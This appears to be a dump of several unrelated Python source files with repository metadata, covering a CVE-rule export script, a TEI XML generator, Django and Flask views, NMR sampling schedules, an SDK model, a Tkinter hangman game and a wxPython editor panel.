                            cve_name = cve_name + "CVE-" + cve_item + " "
                    elif fourth_item[0] == "desc_zh":
                        rule_desc = fourth_item[1]
                    elif fourth_item[0] == "rule_id":
                        rule_id = fourth_item[1]
                    else:
                        # fix: the original `else:` branch contained only a
                        # commented-out print, which is a SyntaxError.
                        pass
                cwe_name = ""
                bid_name = ""
                write_data = [rule_id, cve_name, cwe_name, bid_name, rule_desc]
                write_excel(output_file, write_data)
                print(str(rule_id))
    return True


if __name__ == "__main__":
    fetch_cve_number(os.sys.argv[1], os.path.join(os.getcwd(), "New_Output.xls"))
| [
"deviceobject@gmail.com"
] | deviceobject@gmail.com |
3b4f8d5f9825913e31189eddb81b7034aebe454f | 46669c775591b38f71382f690cb93a4879366595 | /src/020_create_xml.py | 2cdeed0319fdbdfe0862a1c99e4fb20e25ad7850 | [
"CC-BY-4.0"
] | permissive | kouigenjimonogatari/kouigenjimonogatari.github.io | e234abe0e4145bbe879756f6af19a546c01a2ff4 | c0ec798d550bda5670d8af15c4028ff925e6495d | refs/heads/master | 2022-10-12T19:52:05.229525 | 2022-10-04T09:34:51 | 2022-10-04T09:34:51 | 223,747,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,077 | py | import sys
import urllib
import json
import argparse
import urllib.request
import unicodedata
import collections
import os
import xml.etree.ElementTree as ET
import csv
import glob
import urllib.parse
def get_mdata(manifest):
    """Download a IIIF Presentation manifest and index its canvases.

    Parameters:
        manifest (str): URL of the IIIF manifest (JSON).

    Returns:
        dict: maps each canvas ``@id`` to ``{"width": ..., "height": ...,
        "url": ...}`` where ``url`` is the canvas's first image resource.
    """
    print(manifest)
    # Context manager guarantees the HTTP response is closed even if JSON
    # decoding fails; the original left the connection open (resource leak).
    with urllib.request.urlopen(manifest) as res:
        # convert the JSON payload into a Python object
        data = json.loads(res.read().decode('utf-8'))
    canvases = data["sequences"][0]["canvases"]
    # renamed from `map`, which shadowed the builtin
    canvas_index = {}
    for canvas in canvases:
        canvas_index[canvas["@id"]] = {
            "width": canvas["width"],
            "height": canvas["height"],
            "url": canvas["images"][0]["resource"]["@id"]
        }
    return canvas_index
# Volume numbers of the Genji Monogatari chapters to convert (1..54).
vols = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
        11, 12 ,13, 14, 15, 16, 17, 18, 19, 20,
        21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
        31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
        41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
        51, 52, 53, 54]
# Cache of manifest URL -> canvas metadata, so each IIIF manifest is
# fetched only once across all volumes.
m_map = {}
for vol in vols:
    # XPath prefixes for TEI and the xml namespace.
    prefix = ".//{http://www.tei-c.org/ns/1.0}"
    xml = ".//{http://www.w3.org/XML/1998/namespace}"
    # Start every volume from the same TEI template.
    tmp_path = "data/template.xml"
    tree = ET.parse(tmp_path)
    ET.register_namespace('', "http://www.tei-c.org/ns/1.0")
    ET.register_namespace('xml', "http://www.w3.org/XML/1998/namespace")
    root = tree.getroot()
    para = root.find(prefix + "body").find(prefix + "p")
    files = glob.glob("../api/items/*.json")
    surfaceGrp = root.find(prefix+"surfaceGrp")
    # Per-volume collection record: yields the IIIF manifest URL and title.
    with open("../api/item_sets/"+str(vol).zfill(2)+".json", 'r') as f:
        rdf_collection = json.load(f)
    manifest = rdf_collection[0]["http://www.w3.org/2000/01/rdf-schema#seeAlso"][0]["@id"]
    title = rdf_collection[0]["http://www.w3.org/2000/01/rdf-schema#label"][0]["@value"]
    surfaceGrp.set("facs", manifest)
    if manifest not in m_map:
        m_map[manifest] = get_mdata(manifest)
    canvas_data = m_map[manifest]
    prev_page = -1
    # canvas id -> {"url": image url, "zones": [zone elements]}
    canvas_map = {}
    for file in sorted(files):
        with open(file, 'r') as f:
            data = json.load(f)
        # print(file)
        value = data[0]["http://www.w3.org/2000/01/rdf-schema#label"][0]["@value"]
        # if "http://example.org/冊数名" not in data[0]:
        #     continue
        # Volume number is encoded in the isPartOf URL's file name.
        vol_ = int(data[0]["http://purl.org/dc/terms/isPartOf"][0]["@id"].split("/")[-1].split(".")[0])
        if vol != vol_:
            continue
        root.find(prefix + "title").text = "校異源氏物語・"+ title
        id = data[0]["@id"]
        page = data[0]["https://w3id.org/kouigenjimonogatari/api/property/page"][0]["@value"]
        # new page: emit a line break + page break and register its zone
        if page != prev_page:
            prev_page = page
            lb = ET.Element(
                "{http://www.tei-c.org/ns/1.0}lb")
            para.append(lb)
            pb = ET.Element(
                "{http://www.tei-c.org/ns/1.0}pb")
            pb.set("n", str(page))
            pb.set("facs", "#zone_"+str(page).zfill(4))
            para.append(pb)
            # The related canvas is carried as a URL query parameter.
            relation = data[0]["http://purl.org/dc/terms/relation"][0]["@id"]
            relation = urllib.parse.unquote(relation)
            canvas_id = relation.split("canvas=")[1]
            obj = canvas_data[canvas_id]
            if canvas_id not in canvas_map:
                canvas_map[canvas_id] = {
                    "url": obj["url"],
                    "zones": []
                }
            # Even pages map to the right half of the canvas image,
            # odd pages to the left half.
            if page % 2 == 0:
                lrx = obj["width"]
                ulx = int(lrx / 2)
            else:
                lrx = int(obj["width"] / 2)
                ulx = 0
            zone = ET.Element(
                "{http://www.tei-c.org/ns/1.0}zone")
            zone.set("xml:id", "zone_"+str(page).zfill(4))
            zone.set("lrx", str(lrx))
            zone.set("lry", str(obj["height"]))
            zone.set("ulx", str(ulx))
            zone.set("uly", str(0))
            canvas_map[canvas_id]["zones"].append(zone)
        # One <lb/> + <seg> per text line, linked back to the item id.
        lb = ET.Element(
            "{http://www.tei-c.org/ns/1.0}lb")
        para.append(lb)
        line = ET.Element(
            "{http://www.tei-c.org/ns/1.0}seg")
        line.set("corresp", id)
        line.text = value
        # para.append(line)
        para.append(line)
    # Emit one <surface> (image + zones) per canvas used by this volume.
    for canvas_id in canvas_map:
        obj = canvas_map[canvas_id]
        surface = ET.Element(
            "{http://www.tei-c.org/ns/1.0}surface")
        surfaceGrp.append(surface)
        graphic = ET.Element(
            "{http://www.tei-c.org/ns/1.0}graphic")
        graphic.set("n", canvas_id)
        graphic.set("url", obj["url"])
        surface.append(graphic)
        for zone in obj["zones"]:
            surface.append(zone)
    tree.write("../tei/"+str(vol).zfill(2)+".xml", encoding="utf-8")
| [
"na.kamura.1263@gmail.com"
] | na.kamura.1263@gmail.com |
1345771bc1b47bd1670f09a40a36343b34214e39 | f3110c8d0d1a232a0511ec559695882c1eb8594e | /DJANGO/quiz/views.py | 884b75847a4fa12c352577e3ce03ff8523cc36d7 | [] | no_license | SeungWookHan/Flutter-DRF | feb1394d52961824eac2a6e88c667a0e03375c47 | c793ccdacee1a4053a33471c226ff2ce8c5797dc | refs/heads/master | 2023-02-04T23:15:45.945139 | 2020-12-29T15:50:02 | 2020-12-29T15:50:02 | 324,955,539 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 570 | py | from rest_framework.response import Response
from rest_framework.decorators import api_view
from .models import Quiz
from .serializers import QuizSerializer
import random
# Create your views here.
@api_view(['GET'])
def helloAPI(request):
    """Smoke-test endpoint: responds to GET with a fixed greeting."""
    greeting = "hello world!"
    return Response(greeting)
@api_view(['GET'])
def randomQuiz(request, id):
    """Pick `id` distinct quizzes at random and return them serialized."""
    quiz_pool = list(Quiz.objects.all())
    chosen = random.sample(quiz_pool, id)
    # many=True lets the serializer handle a whole list of instances at once
    serializer = QuizSerializer(chosen, many=True)
    return Response(serializer.data)
"hswook12@me.com"
] | hswook12@me.com |
fd3c07e0d681e20aeacc974d84e95c92b8462904 | a08ea65c1ef699171e11c10da75f8291cb0c743c | /JSON work 28/app.py | 902f284a1f33ee91f4953513b256f50f2d70a30d | [] | no_license | hussainMansoor876/Numpy-And-Falsk-Exercise | 476551257d940965eadbea27f5c61d978475ed1f | 1930dee5ac07dc9a18c30c45e196060cf73095d0 | refs/heads/master | 2020-03-28T19:23:50.718360 | 2018-09-16T07:17:39 | 2018-09-16T07:17:39 | 148,971,926 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from flask import Flask, jsonify
app=Flask(__name__)
@app.route("/")
def index():
stud=[{'name':'mansoor','age':19},
{'name':'Qasim','age':23}]
return jsonify({'stud':stud})
app.run(host='0.0.0.0' , port='3000' debug=True) | [
"“hussainmansoor876@gmail.com”"
] | “hussainmansoor876@gmail.com” |
ba1076a3246d6802d9ea52c4729fe3b0503f4722 | 60448d1467b5a2531bab91e8bc721294a397e754 | /nmrpyschedule/generator.py | 6ae0f758186b260b88d0c9eb2eb10be36e7e9cae | [] | no_license | mattfenwick/NMRPySchedule | 8c7fda460b32f09138f08f15d302df4096075fb9 | 22e3399e9964137cb3e382b5805d457bb82e751f | refs/heads/master | 2021-01-18T16:32:23.013635 | 2013-06-11T15:36:29 | 2013-06-11T15:36:29 | 10,610,035 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | '''
@author: matt
'''
import itertools
import math
def uniform(ranges):
    """Generate every n-dimensional grid point inside the given ranges.

    Each element of `ranges` is a (low, high) pair; both endpoints are
    included.  Returns an iterator of coordinate tuples.
    """
    axes = []
    for low, high in ranges:
        axes.append(range(low, high + 1))
    return itertools.product(*axes)
# First ten primes, used as the per-dimension Halton bases; this caps the
# supported dimensionality at 10 (see the check in halton()).
_primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
def _haltonNumber(index, base):
result = 0
f = 1. / base
i = index
while i > 0:
result = result + f * (i % base)
i = int(i / base)
f = f / base
return result
def _scaledHaltonNumber(factor, shift, index, prime):
    """Map a Halton value in [0, 1) onto an integer grid of width `factor`,
    offset by `shift`."""
    fraction = _haltonNumber(index, prime)
    return shift + int(factor * fraction)
def halton(ranges):
    """Yield an endless subrandom (Halton) sequence of n-dimensional
    integer points covering the given inclusive ranges.

    Each dimension uses its own prime base from `_primes`; raises
    ValueError (on first iteration) if there are more dimensions than
    defined primes.
    """
    spans = [max(bounds) - min(bounds) for bounds in ranges]
    offsets = [min(bounds) for bounds in ranges]
    if len(ranges) > len(_primes):
        raise ValueError("not enough primes defined: please define more or reduce the dimensionality")
    index = 0
    while True:
        yield [_scaledHaltonNumber(span, offset, index, prime)
               for (span, offset, prime) in zip(spans, offsets, _primes)]
        index += 1
def _distance(pt, origin):
zipped = zip(pt, origin)
sumSquares = sum([abs(a - b) ** 2 for (a, b) in zipped])
dist = math.sqrt(sumSquares)
return dist
def _myDist(pt, origin, width, maxDeviation):
    """True when the point's distance from `origin` lies within
    `maxDeviation` of some integer multiple of `width`."""
    ratio = _distance(pt, origin) / width
    deviation = abs(ratio - round(ratio)) * width
    return deviation <= maxDeviation
def concentricShell(ranges, shellSpacing, maxDeviation):
    """Return all grid points whose distance from the origin is within
    `maxDeviation` of a multiple of `shellSpacing`.

    The origin is the grid corner formed by the low end of every range.
    """
    shell = []
    origin = [bounds[0] for bounds in ranges]
    for candidate in uniform(ranges):
        if _myDist(candidate, origin, shellSpacing, maxDeviation):
            shell.append(candidate)
    return shell
def _myFilter(pt, origin, offsetAngle, degreeGap, tolerance):
y,x = pt[0] - origin[0], pt[1] - origin[1]
theta = m.atan2(x, y) * 180. / m.pi # angle in degrees
ratio = (theta + offsetAngle) / degreeGap
return abs(ratio - round(ratio)) * degreeGap < tolerance
def radial(ranges, offsetAngle, gapAngle, maximumDeviation):
    """Return the grid points lying (within `maximumDeviation` degrees) on
    'spokes' that radiate from the origin every `gapAngle` degrees,
    rotated by `offsetAngle`."""
    origin = [bounds[0] for bounds in ranges]
    selected = []
    for candidate in uniform(ranges):
        if _myFilter(candidate, origin, offsetAngle, gapAngle, maximumDeviation):
            selected.append(candidate)
    return selected
| [
"mfenwick100@gmail.com"
] | mfenwick100@gmail.com |
66c71b03c28c724553f740d6e72d6d54448e2888 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-bcs/huaweicloudsdkbcs/v2/model/show_blockchain_detail_request.py | 0799bf411b855abd953b527d517b0231e35885cf | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,836 | py | # coding: utf-8
import re
import six
class ShowBlockchainDetailRequest:
    """Request model for querying the details of a blockchain instance.

    Attributes:
        openapi_types (dict): maps each attribute name to its OpenAPI type.
        attribute_map (dict): maps each attribute name to its JSON key.
    """

    # Attribute names whose values are masked with "****" by to_dict().
    sensitive_list = []

    openapi_types = {
        'blockchain_id': 'str'
    }

    attribute_map = {
        'blockchain_id': 'blockchain_id'
    }

    def __init__(self, blockchain_id=None):
        """ShowBlockchainDetailRequest - a model defined in huaweicloud sdk"""
        self._blockchain_id = None
        self.discriminator = None
        # Goes through the property setter below.
        self.blockchain_id = blockchain_id

    @property
    def blockchain_id(self):
        """The blockchain instance ID this request targets."""
        return self._blockchain_id

    @blockchain_id.setter
    def blockchain_id(self, blockchain_id):
        """Set the blockchain instance ID this request targets."""
        self._blockchain_id = blockchain_id

    def to_dict(self):
        """Serialise the model into a plain dictionary, recursing into any
        nested models and masking attributes from `sensitive_list`."""
        result = {}
        for name in self.openapi_types:
            value = getattr(self, name)
            if isinstance(value, list):
                result[name] = [
                    element.to_dict() if hasattr(element, "to_dict") else element
                    for element in value
                ]
            elif hasattr(value, "to_dict"):
                result[name] = value.to_dict()
            elif isinstance(value, dict):
                result[name] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            elif name in self.sensitive_list:
                result[name] = "****"
            else:
                result[name] = value
        return result

    def to_str(self):
        """Return the JSON text of `to_dict()`."""
        import simplejson as json
        return json.dumps(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Two requests are equal when they are the same type with equal fields."""
        if not isinstance(other, ShowBlockchainDetailRequest):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
6fc0fccb0a32e68f70a12fb6df50a35d82b0050b | 3db76c7e67c3112f893c6226d424d4206744b1be | /jogoForca.py | b694eef9bd4014227866162d1edf6afcda73039e | [] | no_license | igorsantos314/Hangman-Game | 699f6d4209ffffc7152c0b15b5809ca531bb38fb | 4ddfb9895b4b062905a471bbba396991f00dce2d | refs/heads/master | 2022-12-18T04:23:57.226503 | 2020-09-22T10:53:14 | 2020-09-22T10:53:14 | 294,830,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,583 | py | from tkinter import *
from tkinter import messagebox
from hangman import *
from random import choice
from time import sleep
import winsound, _thread as th
class game:
    """Tkinter front-end for the hangman game.

    Flow: a theme-chooser window opens first; picking a theme builds the
    main window with the masked word, an on-screen keyboard, the gallows
    area, the clue and the score bar.  Words come from the `hangman`
    helper class.
    """

    def __init__(self):
        # Visual constants shared by every window.
        self.colorTheme = 'White'
        self.titleColor = 'DarkGreen'
        self.banner = 'SeaGreen'
        self.fontCourier = 'Courier 15 bold'
        # Theme index -> clue text shown in the main window.
        # NOTE(review): chooseTheme() sends SOFTWARE ENGINEERING as index 2
        # and COMPUTING as index 3, which disagrees with this mapping — the
        # displayed clue for those two themes looks swapped; confirm.
        self.dictThemes = {0:'AGRICULTURE', 1:'AGRIBUSINESS', 2:'COMPUTING', 3:'SOFTWARE ENGINEERING', 4:'MUSIC'}
        # Congratulation phrases picked at random after a correct word.
        self.pharsesUp = ['Good for you!', 'Very Good!', 'Are you Cheating?']
        self.themeChoosed = 0
        # start the game: open the theme chooser first
        self.chooseTheme()

    def chooseTheme(self):
        """Open the theme-selection window; picking a theme starts the game."""
        windowTheme = Tk()
        windowTheme.resizable(False, False)
        windowTheme.title('THEMES')
        windowTheme['bg'] = self.banner

        # Destroys the chooser window, stores the theme and starts the game.
        def start(theme):
            # destroy the chooser window
            windowTheme.destroy()
            # remember which theme was picked
            self.themeChoosed = theme
            # start the game with that theme
            self.startGame()

        lblThemes = Label(text='CHOOSE THE THEME', font=self.fontCourier, bg=self.banner, fg='white')
        lblThemes.pack()
        btAgriculture = Button(text='AGRICULTURE', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(0))
        btAgriculture.pack(pady=5)
        btAgroBusiness = Button(text='AGROBUSINESS', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(1))
        btAgroBusiness.pack(pady=5)
        btEngSoftware = Button(text='SOFTWARE ENGINEERING', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(2))
        btEngSoftware.pack(pady=5)
        btInformatica = Button(text='COMPUTING', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(3))
        btInformatica.pack(pady=5)
        btMusica = Button(text='MUSIC', font=self.fontCourier, bg=self.titleColor, fg='white', width=20, height=2, command=lambda:start(4))
        btMusica.pack(pady=5)
        windowTheme.mainloop()

    def startGame(self):
        """Reset the round state and open the main game window."""
        self.listKeyBoard = []
        # word provider for the chosen theme
        self.objectHangman = hangman(self.themeChoosed)
        # starting score; correct letters add points, wrong ones subtract
        self.points = 20
        self.windowMain()

    def windowMain(self):
        """Build the main game window: title, word banner, keyboard,
        gallows area, clue and score bar; then run the Tk main loop."""
        self.window = Tk()
        self.window.title('Hangman Game')
        self.window.geometry('900x550+150+10')
        self.window.resizable(False, False)
        self.window['bg'] = self.titleColor
        # how many wrong guesses so far -> which body part to draw next
        self.erros = 0
        # game title
        lblTitle = Label(text='HANGMAN GAME', bg=self.banner, font='Courier 35 bold', fg='white', width=70)
        lblTitle.pack(pady=10)
        # banner that frames the (masked) word
        bannerWord = Label(text='', width=70, height=5, bg=self.colorTheme)
        bannerWord.place(x=350, y=120)
        self.lblWord = Label(text='', font='Courier 20 bold', bg=self.colorTheme, fg='DarkGreen')
        self.lblWord.place(x=360, y=140)
        # on-screen keyboard (each key passes its letter and list index)
        bannerKeyBoard = Label(text='', width=70, height=15, bg=self.banner)
        bannerKeyBoard.place(x=350, y=240)
        self.a = Button(text='A', command=lambda: self.replaceWord('A', 0), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.b = Button(text='B', command=lambda: self.replaceWord('B', 1), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.c = Button(text='C', command=lambda: self.replaceWord('C', 2), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.d = Button(text='D', command=lambda: self.replaceWord('D', 3), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.e = Button(text='E', command=lambda: self.replaceWord('E', 4), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.f = Button(text='F', command=lambda: self.replaceWord('F', 5), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.g = Button(text='G', command=lambda: self.replaceWord('G', 6), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.h = Button(text='H', command=lambda: self.replaceWord('H', 7), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.i = Button(text='I', command=lambda: self.replaceWord('I', 8), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.j = Button(text='J', command=lambda: self.replaceWord('J', 9), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.k = Button(text='K', command=lambda: self.replaceWord('K', 10), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.l = Button(text='L', command=lambda: self.replaceWord('L', 11), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.m = Button(text='M', command=lambda: self.replaceWord('M', 12), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.n = Button(text='N', command=lambda: self.replaceWord('N', 13), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.o = Button(text='O', command=lambda: self.replaceWord('O', 14), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.p = Button(text='P', command=lambda: self.replaceWord('P', 15), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.q = Button(text='Q', command=lambda: self.replaceWord('Q', 16), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.r = Button(text='R', command=lambda: self.replaceWord('R', 17), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.s = Button(text='S', command=lambda: self.replaceWord('S', 18), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.t = Button(text='T', command=lambda: self.replaceWord('T', 19), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.u = Button(text='U', command=lambda: self.replaceWord('U', 20), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.v = Button(text='V', command=lambda: self.replaceWord('V', 21), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.x = Button(text='X', command=lambda: self.replaceWord('X', 22), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.w = Button(text='W', command=lambda: self.replaceWord('W', 23), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.y = Button(text='Y', command=lambda: self.replaceWord('Y', 24), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        self.z = Button(text='Z', command=lambda: self.replaceWord('Z', 25), width=2, height=1, font=self.fontCourier, bg= self.titleColor, fg='white')
        # Add the keys to the list.  NOTE: X is deliberately listed before W
        # to match the posLet indices wired into the lambdas above.
        self.listKeyBoard = [ self.a, self.b, self.c, self.d, self.e, self.f, self.g, self.h, self.i, self.j, self.k, self.l, self.m, self.n,
                             self.o, self.p, self.q, self.r, self.s, self.t, self.u, self.v, self.x, self.w, self.y, self.z]
        posY = 280
        posX = 380
        # Lay the keys out on three rows (row breaks after key 11 and 20).
        for pos, i in enumerate(self.listKeyBoard):
            i.place(x=posX, y=posY)
            posX += 40
            if pos == 10:
                posY = 330
                posX = 420
            elif pos == 19:
                posY = 380
                posX = 480
        #self.a.place(x=370, y=260)
        # gallows banner
        bannerDoll = Label(text='', width=40, height=23, bg=self.banner)
        bannerDoll.place(x=30, y=120)
        # clue
        lblClue = Label(text='CLUE: {}'.format(self.dictThemes[self.themeChoosed]), font=self.fontCourier, bg=self.banner, fg='white')
        lblClue.place(x=40, y=130)
        self.lblPoints = Label(text='POINTS: {}'.format(self.points), font='Courier 35 bold', fg='orange', bg=self.banner, width=50)
        self.lblPoints.place(x=0, y=490)
        self.surffleWords()
        # draw the hangman figure (no-op while there are no errors)
        self.setDoll()
        self.window.mainloop()

    def surffleWords(self):
        """Draw the next word, or end the game when the list is exhausted."""
        # fetch the drawn word
        # NOTE(review): 'E' appears to be a sentinel from hangman.getWord()
        # meaning no words are left — confirm against the hangman class.
        self.word = self.objectHangman.getWord()[0]
        if self.word == 'E':
            # end-of-game message
            lblFinishGame = Label(text=' YOU ARE THE BEST 😱 ', font='Courier 50 bold', bg='red', fg='white', height=8, )
            lblFinishGame.place(x=0, y=0)
            # restart button
            self.btRestart = Button(text='RESTART GAME', font='Courier 12 bold', bg='red', fg='white', command=self.restartGame)
            self.btRestart.place(x=360, y=350)
        else:
            # mask the letters with dashes
            self.replaceLetTrace()

    def replaceLetTrace(self):
        """Display the current word with every letter masked by a dash."""
        traceWord = ''
        # scan the word, keeping spaces and masking everything else
        for i in self.word:
            if i == ' ':
                traceWord += ' '
            else:
                traceWord += '-'
        # show the mask in the word label
        self.lblWord['text'] = traceWord

    # Handles a key press: decides whether the guess was right or wrong.
    def replaceWord(self, let, posLet):
        # does the letter occur in the word?
        if let in self.word:
            letPositions = []
            # collect every index where the letter occurs
            for pos,i in enumerate(self.word):
                if i == let:
                    letPositions.append(pos)
            # reveal the letter(s)
            self.showNewWord(let, letPositions)
            # did this guess complete the word?
            self.verifyWord()
            # reward: 5 points
            self.points += 5
        else:
            # penalty: 2 points
            self.points -= 2
            # one more error
            self.erros += 1
            # draw the next body part
            self.setDoll()
            # error beep on a worker thread so the UI stays responsive
            th.start_new_thread(self.soundError, ())
        # refresh the score display
        self.refreshPoints()
        # remove the pressed key from the keyboard
        self.deleteKey(posLet)

    def soundError(self):
        # Windows-only beep (winsound) played for a wrong guess.
        b = winsound.Beep
        b(420,200)

    def showNewWord(self, let, letPositions):
        """Reveal `let` at every index in `letPositions` of the masked label."""
        currentWord = list(self.lblWord['text'])
        # replace each corresponding dash with the guessed letter
        for i in letPositions:
            currentWord[i] = let
        self.lblWord['text'] = ''.join(currentWord)

    def verifyWord(self):
        """When the masked label equals the word, congratulate and restart
        the main window with a new word."""
        if self.word == self.lblWord['text']:
            # show a random congratulation phrase
            messagebox.showinfo('',choice(self.pharsesUp))
            # destroy this window and open a fresh one
            self.window.destroy()
            # the new window draws the next word
            self.windowMain()

    def deleteKey(self, posLet):
        # Protected: the button may already be gone when the window closed.
        try:
            # destroy the pressed button
            self.listKeyBoard[posLet].destroy()
        except:
            pass

    def refreshPoints(self):
        # Swallows the Tcl error raised when updating after the window closed.
        try:
            # update the score label
            self.lblPoints['text'] = 'POINTS: {}'.format(self.points)
        except TclError:
            pass

    def setDoll(self):
        """Draw the next hangman body part for the current error count, or
        end the game when the player is out of points / fully drawn."""
        if self.points == 0:
            # the player ran out of points
            self.youLose()
        elif self.erros == 1:
            lblHead = Label(text='', fg='white', bg='black', width=4, height=2, font='Arial 12 bold')
            lblHead.place(x=140, y=180)
        elif self.erros == 2:
            lblBody = Label(text='', fg='white', bg='black', width=4, height=5, font='Arial 12 bold')
            lblBody.place(x=140, y=235)
        elif self.erros == 3:
            lblLeftArm = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
            lblLeftArm.place(x=110, y=235)
        elif self.erros == 4:
            lblRightArm = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
            lblRightArm.place(x=190, y=235)
        elif self.erros == 5:
            lblRightLeg = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
            lblRightLeg.place(x=140, y=340)
        elif self.erros == 6:
            lblLeftLeg = Label(text='', fg='white', bg='black', width=2, height=5, font='Arial 12 bold')
            lblLeftLeg.place(x=160, y=340)
            # the figure is complete: the player loses
            self.youLose()

    def youLose(self):
        # game over - you lost
        lblFinishGame = Label(text=' YOU LOSE !!! 😭 ', font='Courier 50 bold', bg='blue', fg='white', height=8, )
        lblFinishGame.place(x=0, y=0)
        # restart button
        self.btRestart = Button(text='RESTART GAME', font='Courier 12 bold', bg='blue', fg='white', command=self.restartGame)
        self.btRestart.place(x=360, y=350)

    # restart the whole game
    def restartGame(self):
        # destroy the main window
        self.window.destroy()
        # start over
        self.startGame()
# Instantiating the class immediately launches the GUI (blocking mainloop).
game()
| [
"55886200+igorsantos314@users.noreply.github.com"
] | 55886200+igorsantos314@users.noreply.github.com |
8c7a067fdb895eab44d1aa3b5283a5653c4fd265 | 50c55625354580101a8dae8504e8dc887a694ed7 | /editor/Welder/Editor/core/script_editor/panels/script_editor_panel.py | f636982c96f8f729949b58610001140958a7d816 | [] | no_license | johndpope/arcreator | def50d06e9634abda2ff968d2e165d882cd26bf9 | db81dd3ec415619ea8f5e9c74ee852d171a36e93 | refs/heads/master | 2020-03-21T23:40:53.489419 | 2015-08-30T00:40:17 | 2015-08-30T00:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,042 | py | import wx
from wx import stc
import os
import re
import welder_kernel as kernel
from PyitectConsumes import ScriptEditorManager as SM
from PyitectConsumes import PanelBase, ScriptEditor_Panel_Template, ScriptSettings_Dialog
# -------------------------------------------------------------------------
# ScriptEditor_Panel
# -------------------------------------------------------------------------
class ScriptEditor_Panel(ScriptEditor_Panel_Template, PanelBase):
    """wx panel hosting the Welder script editor: a styled-text control, a
    toolbar and a script-selection combo box, docked via the ARC panel
    manager."""

    # Layout/behaviour hints consumed by the ARC panel manager when this
    # panel is docked, floated, minimised or closed.
    _arc_panel_info = {
        "Name": "Script Editor",
        "Caption": "Script Editor",
        "CaptionV": True,
        "Center": None,
        "CloseB": True,
        "DestroyOC": True,
        "Floatable": True,
        "Float": None,
        "IconARCM": 'script',
        "MaximizeB": True,
        "MinimizeB": True,
        "MinimizeM": ["POS_SMART", "CAPT_SMART"],
        "Movable": True,
        "NotebookD": True,
        "Resizable": True,
        "Snappable": True,
        "Layer": 1
    }

    def __init__(self, parent, index=-1):
        """Basic constructor for the ScriptEditor_Panel.

        parent: the wx parent window.
        index: script to open initially; -1 opens nothing.
        """
        ScriptEditor_Panel_Template.__init__(self, parent)
        self.CreateToolBar()
        # self.statusBar = parent.CreateStatusBar()
        # TODO: give the script editor its own status bar
        # self.statusBar = kernel.GlobalObjects["MainStatusBar"]
        # NOTE(review): self.statusBar is never assigned here (both
        # assignments above are commented out) — unless the template base
        # class provides it, SetFieldsCount raises AttributeError; confirm.
        self.statusBar.SetFieldsCount(3)
        self.statusBar.SetStatusWidths([-4, -4, -2])
        # TODO: Get path by using project path + Data/Scripts/
        # path = r"C:\Users\Eric\Desktop\ARC\editor\Welder\src\RTP\Templates\Chonicles of Sir Lag-A-Lot\Data\Scripts"
        path = os.path.join(kernel.GlobalObjects["CurrentProjectDir"], 'Data', 'Scripts')
        try:
            SM.LoadScripts()
        except:
            kernel.Log(
                'Failed to successfully load all scripts.', '[ScriptEditor]', True, True)
        # Scripts is shared module-wide with the event handlers below.
        global Scripts
        Scripts = kernel.GlobalObjects['Scripts']
